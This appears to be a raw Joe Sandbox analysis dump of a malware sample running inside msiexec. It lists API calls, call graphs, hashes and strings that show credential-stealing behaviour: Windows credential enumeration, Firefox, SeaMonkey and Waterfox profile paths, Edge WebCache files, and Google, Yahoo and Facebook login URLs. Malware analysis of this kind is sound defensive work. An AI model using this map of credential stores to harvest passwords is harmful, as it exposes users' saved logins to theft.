                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                    • wcslen.MSVCRT ref: 0040C82C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                    • API String ID: 2936932814-4196376884
                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                    APIs
                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                    • wcslen.MSVCRT ref: 0040BE06
                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                    • memset.MSVCRT ref: 0040BE91
                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                    • wcschr.MSVCRT ref: 0040BF24
                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                    • String ID:
                                                    • API String ID: 697348961-0
                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                    APIs
                                                    • memset.MSVCRT ref: 00403CBF
                                                    • memset.MSVCRT ref: 00403CD4
                                                    • memset.MSVCRT ref: 00403CE9
                                                    • memset.MSVCRT ref: 00403CFE
                                                    • memset.MSVCRT ref: 00403D13
                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                    • memset.MSVCRT ref: 00403DDA
                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                    • String ID: Waterfox$Waterfox\Profiles
                                                    • API String ID: 1829478387-11920434
                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                    APIs
                                                    • memset.MSVCRT ref: 00403E50
                                                    • memset.MSVCRT ref: 00403E65
                                                    • memset.MSVCRT ref: 00403E7A
                                                    • memset.MSVCRT ref: 00403E8F
                                                    • memset.MSVCRT ref: 00403EA4
                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                    • memset.MSVCRT ref: 00403F6B
                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                    • API String ID: 1829478387-2068335096
                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                    APIs
                                                    • memset.MSVCRT ref: 00403FE1
                                                    • memset.MSVCRT ref: 00403FF6
                                                    • memset.MSVCRT ref: 0040400B
                                                    • memset.MSVCRT ref: 00404020
                                                    • memset.MSVCRT ref: 00404035
                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                    • memset.MSVCRT ref: 004040FC
                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                    • API String ID: 1829478387-3369679110
                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                    APIs
                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                    • API String ID: 3510742995-2641926074
                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                    • free.MSVCRT ref: 0041848B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorFileLastfree
                                                    • String ID: |A
                                                    • API String ID: 981974120-1717621600
                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                    APIs
                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                    • memset.MSVCRT ref: 004033B7
                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                    • wcscmp.MSVCRT ref: 004033FC
                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                    • String ID: $0.@
                                                    • API String ID: 2758756878-1896041820
                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 2941347001-0
                                                    • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                    • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                    APIs
                                                    • memset.MSVCRT ref: 00403C09
                                                    • memset.MSVCRT ref: 00403C1E
                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                    • wcscat.MSVCRT ref: 00403C47
                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • wcscat.MSVCRT ref: 00403C70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memsetwcscat$wcscpywcslen
                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                    • API String ID: 2489821370-1174173950
                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                    APIs
                                                    • memset.MSVCRT ref: 0040A824
                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • wcscpy.MSVCRT ref: 0040A854
                                                    • wcscat.MSVCRT ref: 0040A86A
                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 669240632-0
                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                    APIs
                                                    • wcschr.MSVCRT ref: 00414458
                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                    • String ID: "%s"
                                                    • API String ID: 1343145685-3297466227
                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                    • String ID: GetProcessTimes$kernel32.dll
                                                    • API String ID: 1714573020-3385500049
                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                    APIs
                                                    • memset.MSVCRT ref: 004087D6
                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                    • memset.MSVCRT ref: 00408828
                                                    • memset.MSVCRT ref: 00408840
                                                    • memset.MSVCRT ref: 00408858
                                                    • memset.MSVCRT ref: 00408870
                                                    • memset.MSVCRT ref: 00408888
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 2911713577-0
                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                    APIs
                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmp
                                                    • String ID: @ $SQLite format 3
                                                    • API String ID: 1475443563-3708268960
                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmpqsort
                                                    • String ID: /nosort$/sort
                                                    • API String ID: 1579243037-1578091866
                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                    APIs
                                                    • memset.MSVCRT ref: 0040E60F
                                                    • memset.MSVCRT ref: 0040E629
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    Strings
                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                    • API String ID: 3354267031-2114579845
                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                    APIs
                                                    Strings
                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                    • API String ID: 2221118986-1725073988
                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
